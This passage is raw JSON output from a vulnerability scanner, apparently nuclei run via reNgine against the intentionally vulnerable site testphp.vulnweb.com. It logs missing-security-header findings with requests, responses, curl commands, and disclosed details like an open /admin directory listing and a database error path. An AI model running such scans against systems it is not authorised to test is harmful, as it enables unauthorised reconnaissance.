--\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:53.102318076Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36' 'http://testphp.vulnweb.com/login'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/bxss/adminPan3l\",\"path\":\"/bxss/adminPan3l\",\"matched-at\":\"http://testphp.vulnweb.com/bxss/adminPan3l/\",\"request\":\"GET /bxss/adminPan3l HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:35 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003chead\\u003e\\n \\u003ctitle\\u003eAdministrative panel\\u003c/title\\u003e \\n \\u003clink rel=\\\"stylesheet\\\" type=\\\"text/css\\\" href=\\\"style.css\\\"\\u003e \\n\\u003c/head\\u003e\\n \\n\\u003cbody\\u003e\\n\\u003cp\\u003e \\n \\u003ccenter\\u003e\\n \\u003cimg src=\\\"http://www.acunetix.com/wp-content/themes/acunetix/images/logo.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\n \\u003ch2\\u003eAdministrative Panel\\u003c/h2\\u003e\\n \\u003c/center\\u003e\\n\\u003c/p\\u003e \\n \\n\\u003cb\\u003eLast 100 visitors on this site\\u003c/b\\u003e\\n\\n\\nDeprecated: mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /hj/var/www/bxss/database_connect.php on line 2\\n\\nWarning: mysql_connect(): Access denied for user 'bxss'@'localhost' (using password: YES) in /hj/var/www/bxss/database_connect.php on line 2\\nWebsite is out of order. Please visit back later. Thank you for understanding.\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:53.102363031Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0' 'http://testphp.vulnweb.com/bxss/adminPan3l'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/hpp\",\"path\":\"/hpp\",\"matched-at\":\"http://testphp.vulnweb.com/hpp/\",\"request\":\"GET /hpp HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 Edg/98.0.1108.50\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:40 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003ctitle\\u003eHTTP Parameter Pollution Example\\u003c/title\\u003e\\r\\n\\r\\n\\u003ca href=\\\"?pp=12\\\"\\u003echeck\\u003c/a\\u003e\\u003cbr/\\u003e\\r\\n\\r\\n\\u003chr\\u003e\\r\\n\\u003ca href='http://blog.mindedsecurity.com/2009/05/client-side-http-parameter-pollution.html'\\u003eOriginal article\\u003c/a\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:53.102375457Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 Edg/98.0.1108.50' 'http://testphp.vulnweb.com/hpp'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2/A01\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2/A01 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Web Camera A4Tech PK-335E\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:53.297993414Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1\",\"path\":\"/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1\",\"request\":\"GET /Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:53.298047849Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3/A01\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3/A01 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Laser Color Printer HP LaserJet M551dn, A4\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:53.456001768Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/admin\",\"path\":\"/admin\",\"matched-at\":\"http://testphp.vulnweb.com/admin/\",\"request\":\"GET /admin HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_6_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:35 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /admin/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /admin/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"create.sql\\\"\\u003ecreate.sql\\u003c/a\\u003e 11-May-2011 10:27 523\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:53.455986388Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_6_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36' 'http://testphp.vulnweb.com/admin'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop\",\"path\":\"/Mod_Rewrite_Shop\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/\",\"request\":\"GET /Mod_Rewrite_Shop HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:56.0) Gecko/20100101 Firefox/56.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003cdiv id=\\\"content\\\"\\u003e\\r\\n\\t\\u003cdiv class='product'\\u003e\\u003ctable\\u003e\\u003ctr\\u003e\\u003ctd width='180px'\\u003e\\u003cimg src='images/1.jpg'\\u003e\\u003c/td\\u003e\\u003ctd width='400px'\\u003e\\u003ca href='Details/network-attached-storage-dlink/1/'\\u003eNetwork Storage D-Link DNS-313 enclosure 1 x SATA\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd width='50px' bgcolor='#F8F8F8'\\u003e\\u003ca href='Details/network-attached-storage-dlink/1/'\\u003ePrice\\u003cbr\\u003e359 \\u0026euro;\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/table\\u003e\\u003c/tr\\u003e\\u003c/div\\u003e\\u003cdiv class='product'\\u003e\\u003ctable\\u003e\\u003ctr\\u003e\\u003ctd width='180px'\\u003e\\u003cimg src='images/2.jpg'\\u003e\\u003c/td\\u003e\\u003ctd width='400px'\\u003e\\u003ca href='Details/web-camera-a4tech/2/'\\u003eWeb Camera A4Tech PK-335E\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd width='50px' bgcolor='#F8F8F8'\\u003e\\u003ca href='Details/web-camera-a4tech/2/'\\u003ePrice\\u003cbr\\u003e10 \\u0026euro;\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/table\\u003e\\u003c/tr\\u003e\\u003c/div\\u003e\\u003cdiv class='product'\\u003e\\u003ctable\\u003e\\u003ctr\\u003e\\u003ctd width='180px'\\u003e\\u003cimg src='images/3.jpg'\\u003e\\u003c/td\\u003e\\u003ctd width='400px'\\u003e\\u003ca href='Details/color-printer/3/'\\u003eLaser Color Printer HP LaserJet M551dn, A4\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd width='50px' bgcolor='#F8F8F8'\\u003e\\u003ca href='Details/color-printer/3/'\\u003ePrice\\u003cbr\\u003e812 \\u0026euro;\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/table\\u003e\\u003c/tr\\u003e\\u003c/div\\u003e\\u003c/div\\u003e\\r\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:53.456044291Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:56.0) Gecko/20100101 Firefox/56.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:53.837865932Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2/3L\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2/3L HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.53\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Web Camera A4Tech PK-335E\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:53.837902979Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.53' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/cgi-bin/status\",\"path\":\"/cgi-bin/status\",\"matched-at\":\"http://testphp.vulnweb.com/cgi-bin/status\",\"request\":\"GET /cgi-bin/status HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4861.152 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=iso-8859-1\\r\\nDate: Wed, 13 Nov 2024 02:41:39 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//IETF//DTD HTML 2.0//EN\\\"\\u003e\\n\\u003chtml\\u003e\\u003chead\\u003e\\n\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\n\\u003c/head\\u003e\\u003cbody\\u003e\\n\\u003ch1\\u003eNot Found\\u003c/h1\\u003e\\n\\u003cp\\u003eThe requested URL was not found on this server.\\u003c/p\\u003e\\n\\u003chr\\u003e\\n\\u003caddress\\u003eApache/2.4.46 (Ubuntu) Server at localhost Port 8000\\u003c/address\\u003e\\n\\u003c/body\\u003e\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:53.837955036Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4861.152 Safari/537.36' 